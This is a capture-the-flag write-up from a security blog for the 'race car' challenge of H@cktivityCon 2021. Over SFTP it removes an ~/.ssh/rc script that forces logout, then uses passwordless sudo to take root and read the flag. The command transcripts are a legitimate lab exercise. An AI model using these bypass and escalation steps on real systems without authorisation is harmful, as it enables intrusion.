Fey - Security Blog

Apparently, we have ssh credentials but the session seems to be shuted down automaticaly every time we are logged in.

ssh -p 32689 user@challenge.ctf.games
user@challenge.ctf.games's password: 
Connection to challenge.ctf.games closed by remote host.
Connection to challenge.ctf.games closed.

So I found I bypass to that problem, as you known, one part of the ssh protocol is the secure ftp protocol. So I tried to log with stfp...

sftp -P 32689 user@challenge.ctf.games
user@challenge.ctf.games's password: 
Connected to challenge.ctf.games.
sftp> ls -la
drwxr-xr-x    1 user     user         4096 Sep 19 09:22 .
drwxr-xr-x    1 root     root         4096 Sep 16 14:43 ..
-rw-r--r--    1 user     user          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 user     user         3771 Feb 25  2020 .bashrc
drwx------    2 user     user         4096 Sep 19 09:22 .cache
-rw-r--r--    1 root     root            0 Sep 16 14:44 .hushlogin
-rw-r--r--    1 user     user          807 Feb 25  2020 .profile
drwxr-xr-x    1 root     root         4096 Sep 16 14:44 .ssh

Great ! Now let's find why the ssh connection is close each time we try to log

sftp> cd .ssh
sftp> ls
rc  
sftp> get rc
Fetching /home/user/.ssh/rc to rc

cat rc
#!/bin/bash

pkill ssh
logout

Okay, it's because of this script that we are disconnected, let's remove it and have a shell

echo "" > rc
sftp -P 32689 user@challenge.ctf.games
user@challenge.ctf.games's password:
Connected to challenge.ctf.games.

sftp> cd .ssh
sftp> put rc
Uploading rc to /home/user/.ssh/rc
sftp> ^D

ssh -p 32689 user@challenge.ctf.games   
user@challenge.ctf.games's password: 
user@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~$ id 
uid=1000(user) gid=1000(user) groups=1000(user)

Nice, now let's root it

user@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~$ sudo -l
Matching Defaults entries for user on race-car-30918e9ac65137c5-56bd64f95d-nff7h:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on race-car-30918e9ac65137c5-56bd64f95d-nff7h:
    (root) NOPASSWD: ALL

#We can execute any command as root
user@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~$ sudo bash
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~# id
uid=0(root) gid=0(root) groups=0(root)
#Now let's get the flag
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:/home/user# cd /root
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~# ls
flag.txt
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~# cat flag.txt 
flag{f3deae2684d2bbec63d088374502a339}

/ctfs/h@cktivitycon - 2021/misc/race car

Apparently, we have ssh credentials but the session seems to be shuted down automaticaly every time we are logged in.

So I found I bypass to that problem, as you known, one part of the ssh protocol is the secure ftp protocol. So I tried to log with stfp...

Great ! Now let's find why the ssh connection is close each time we try to log

Okay, it's because of this script that we are disconnected, let's remove it and have a shell

Nice, now let's root it

Done !